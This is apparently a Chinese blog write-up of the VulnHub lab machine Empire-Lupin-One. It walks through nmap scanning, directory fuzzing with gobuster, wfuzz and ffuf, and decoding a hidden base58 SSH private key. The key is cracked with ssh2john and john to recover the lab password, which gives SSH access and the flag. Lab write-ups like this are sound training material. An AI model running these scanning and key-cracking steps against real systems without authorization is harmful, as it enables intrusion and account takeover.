vulnhub Empire-Lupin-One靶机

搭建靶机;拖进来就行

扫描靶机IP

复制代码
nmap -O 192.168.47.130

1.信息收集

复制代码
nmap -p- 192.168.47.133
nmap -sC -sV -p 22,80 192.168.47.133 -oN nmap.log

目录扫描

复制代码
gobuster dir -w 字典目录 -u 目标
gobuster dir -w zi.txt -u http://192.168.47.133/

2.寻找薄弱点

查看robots.txt文件,发现一个不可访问的~myfiles文件,下面应该有其他文件,模糊测试下

复制代码
wfuzz -c -w zi.txt -u http://192.168.47.133/~FUZZ | grep -v 404

扫到一个 secret

3.解密

得到一封信重要的有:1.存在隐藏文件 2.用fasttrack字典爆破密码 3.用户名icex64

复制代码
ffuf -u 'http://192.168.47.133/~secret/.FUZZ' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .txt,.pub,.html,.bak -mc 200

直接去访问一下这个文件mysecret.txt

去解密一下

base64解密不出来;base58可以;这就是登录系统的私钥

创建两个文档;2.txt写我们解密后的数据;1.txt空的

我们可以利用kali自带的ssh2john进行密码的暴力破解

把我们解密后的数据写到1.txt

复制代码
ssh2john 2.txt > 1.txt
john --wordlist=/usr/share/wordlists/fasttrack.txt 1.txt
得到密码P@55w0rd!
用户名:icex64
密码:P@55w0rd!

4.登录系统

复制代码
#如果出现报错//报错的原因是Linux和Windows的换行符不一致
chmod 600 key	#提升权限
dos2unix key	#改变格式
#在连接
ssh icex64@192.168.47.133 -i key

成功获取flag

相关推荐
qqxhb9 小时前
系统架构设计师备考第18天——信息安全基础知识
网络安全·信息安全·系统架构·数据安全·可用性·可控性
Suckerbin10 小时前
digitalworld.local: TORMENT
笔记·安全·web安全·网络安全
lingggggaaaa12 小时前
小迪安全v2023学习笔记(八十讲)—— 中间件安全&WPS分析&Weblogic&Jenkins&Jetty&CVE
笔记·学习·安全·web安全·网络安全·中间件·wps
fasewer12 小时前
玄机--windows日志分析
运维·服务器·windows·网络安全
emma羊羊15 小时前
【 SQL注入漏洞靶场】第二关文件读写
sql·网络安全·靶场·sql注入
聚铭网络16 小时前
聚铭网络入选数世咨询《中国数字安全价值图谱》“日志审计”推荐企业
网络安全
Suckerbin1 天前
LAMPSecurity: CTF5靶场渗透
笔记·安全·web安全·网络安全
不老刘1 天前
行为式验证码技术解析:滑块拼图、语序选词与智能无感知
网络安全·验证码·行为式验证码
房屋安全鉴定检测1 天前
房屋安全鉴定报告有效期多久
安全·网络安全
房屋安全鉴定检测2 天前
房屋安全鉴定需要什么条件
安全·网络安全